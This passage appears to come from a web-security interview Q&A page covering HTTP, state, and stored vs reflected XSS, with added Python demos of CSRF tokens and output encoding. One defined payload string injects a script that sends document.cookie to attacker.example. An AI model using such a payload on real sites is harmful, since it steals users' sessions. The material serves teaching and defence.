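    sess = SESSIONS.get(cookies.get("session"))
    if sess is None:
        return 401, "no session"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), sess["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    del SESSIONS[cookies["session"]]
    return 200, "logged out"


def simulate():
    """Victim is logged in; an attacker's page tries two forged requests; then the real form."""
    sid = login("victim")
    results = {}
    # 1. <img src="https://target/logout/">: the browser attaches the cookie, but it is a GET.
    results["img_tag"] = handle_logout("GET", {"session": sid}, {})
    # 2. Auto-submitting POST form on the attacker's page: cookie attached, token unknown.
    results["forged_post"] = handle_logout("POST", {"session": sid}, {"csrf_token": "guess"})
    # 3. The real form: the browser posts back the token the server issued for this session.
    form_html = render_logout_form(sid)
    token = form_html.split('name="csrf_token" value="')[1].split('"')[0]
    results["legit_post"] = handle_logout("POST", {"session": sid}, {"csrf_token": token})
    return results


if __name__ == "__main__":
    print(simulate())
```

The token works because the same-origin policy stops the attacker's page from reading the victim's copy of the form, so it cannot learn the value the server expects. Setting the session cookie with SameSite=Lax or Strict is a complementary browser-side control, and a GET that changes state (the logout URL in the question) has to be turned into a POST before any token check can help.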
Question 7. What’s The Difference Between Http And Html?
Answer :
Obviously the answer is that one is the networking/application protocol and the other is the markup
language, but again, the main thing you’re looking for is for him not to panic.
Question 8. How Does Http Handle State?
Answer :
It does not, of course. Not natively. Good answers are things like “cookies”, but the best answer is that
cookies are a hack to make up for the fact that HTTP doesn’t do it itself.

Question 9. What Exactly Is Cross Site Scripting?


Answer :
You’d be amazed at how many security people don’t know even the basics of this immensely important
topic. We’re looking for them to say anything regarding an attacker getting a victim to run script content
(usually JavaScript) within their browser.

Question 10. What's The Difference Between Stored And Reflected Xss?
Answer :
Stored XSS is persisted by the application (for example in a database, or on a static page) and is served
to every user who views the affected page. Reflected XSS comes from the user's own request (usually a link
constructed by an attacker) and is echoed back into the response, so it runs in the victim's browser when
the results are returned from the site.
Question 11. What Are The Common Defenses Against Xss?
Answer :
Input validation and, above all, context-sensitive output encoding of untrusted data, with a Content
Security Policy and HttpOnly session cookies as defence in depth.
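The defences named in this answer and the stored/reflected distinction from Question 10, applied to the cookie-stealing injection described under Q7 at the top of this section, as an added example that is not part of the original page. The comment store, the two page fragments and the payload strings are constructed for this example; the encoding rules follow the HTML, attribute and JavaScript contexts that untrusted data lands in.

```python
import html
import json
import re

# Constructed data: a stored comment (attacker-controlled) is the classic stored XSS
# vector; a search term echoed back into the page is the reflected one.
COMMENTS = []  # stand-in for the database table a stored payload lands in
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def post_comment(text):
    COMMENTS.append(text)


def render_comments_unsafe():
    """Vulnerable: stored input is concatenated straight into the HTML."""
    return "<ul>" + "".join("<li>%s</li>" % c for c in COMMENTS) + "</ul>"


def render_comments_safe():
    """Fixed: HTML-encode each value for the element-content context."""
    return "<ul>" + "".join("<li>%s</li>" % html.escape(c) for c in COMMENTS) + "</ul>"


def render_search_unsafe(q):
    """Vulnerable reflected XSS: the query echoes into an attribute and into a script block."""
    return ('<input name="q" value="%s">'
            '<script>var last = "%s";</script>' % (q, q))


def render_search_safe(q):
    """Fixed: the attribute context gets quote-escaping; the script context gets JSON encoding
    with '<' escaped so a '</script>' inside the value cannot close the block early."""
    attr = html.escape(q, quote=True)
    js = json.dumps(q).replace("<", "\\u003c")
    return '<input name="q" value="%s"><script>var last = %s;</script>' % (attr, js)


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")


def valid_username(name):
    """Input validation by allow-list, for fields whose format is known. It complements
    output encoding rather than replacing it: a free-text comment cannot be validated this way."""
    return bool(USERNAME_RE.match(name))


def payload_executes(rendered, payload):
    """Demo check: the raw payload tag survived into the output, so a browser would run it."""
    return payload in rendered
```

One encoder per output context is the rule: html.escape covers element content and (with quote=True) attribute values, while data placed inside a script block needs a JavaScript string encoding, and neither is a substitute for the other. Validation is applied where the expected format is narrow enough to allow-list.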
